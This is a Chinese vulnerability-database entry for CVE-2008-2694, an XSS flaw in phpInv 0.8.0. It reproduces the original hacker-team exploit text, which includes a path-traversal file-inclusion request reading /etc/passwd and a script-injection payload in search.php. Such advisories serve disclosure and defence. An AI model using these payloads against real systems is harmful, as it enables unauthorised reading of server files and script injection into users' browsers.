phpInv search.php 跨站脚本攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1115371 漏洞类型 跨站脚本
发布时间 2008-06-08 更新时间 2009-04-14
CVE编号 CVE-2008-2694 CNNVD-ID CNNVD-200806-196
漏洞平台 PHP CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/5754
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200806-196
|漏洞详情
phpInv0.8.0版本中的search.php存在跨站脚本攻击漏洞。远程攻击者可以借助关键词参数,注入任意的web脚本或HTML。
|漏洞EXP
=========================================================
 PHPInv 0.8.0 (LFI/XSS) Multiple Remote Vulnerabilities
=========================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'

AUTHOR : CWH Underground
DATE   : 8 June 2008
SITE   : www.citec.us


#####################################################
 APPLICATION : PHPInv
 VERSION     : 0.8.0
 DOWNLOAD    : http://sourceforge.net/projects/phpinv
#####################################################

---LFI---

##############################################
Vulnerable: entry.php (?action=)

43:	if (isset($action) & !isset($noconfirm)) {
44:		include("inc/entry_$action.php");
45:	}

###############################################

---Description---

   Use Web Proxy (Web Scarab, Burb Proxy, etc...) to intercept URI -> 
http://[target]/[phpinv_path]/entry.php?hash=19e9abf204087d0765f81c5bfb1a6fef&categoryid=1&orderby=10&action=test

   Then You can change detail in GET request for this URI, Example

[-]GET http://192.168.1.103:80/phpinv/entry.php?hash=19e9abf204087d0765f81c5bfb1a6fef&categoryid=1&orderby=10&action=/../../../../../phpinfo HTTP/1.1
[-]Accept: */*
[-]User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
[-]Host: 192.168.1.103
[-]Connection: Close
[-]Pragma: no-cache

   Now you can see phpinfo.php in PHPInv page...  :) 

Tip!! http://192.168.1.103:80/phpinv/entry.php?hash=19e9abf204087d0765f81c5bfb1a6fef&categoryid=1&orderby=10&action=/../../../../../etc/passwd%00 HTTP/1.1


---XSS---

[+]search.php (keyword)

GET http://192.168.1.103:80/phpinv/search.php?hash=19e9abf204087d0765f81c5bfb1a6fef&keyword=>"><script>alert(123);</script>&categoryid=1&action=Search HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: 192.168.1.103
Connection: Close
Pragma: no-cache


##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

# milw0rm.com [2008-06-08]
|参考资料

来源:XF
名称:phpinv-search-xss(42928)
链接:http://xforce.iss.net/xforce/xfdb/42928
来源:BID
名称:29597
链接:http://www.securityfocus.com/bid/29597
来源:MILW0RM
名称:5754
链接:http://www.milw0rm.com/exploits/5754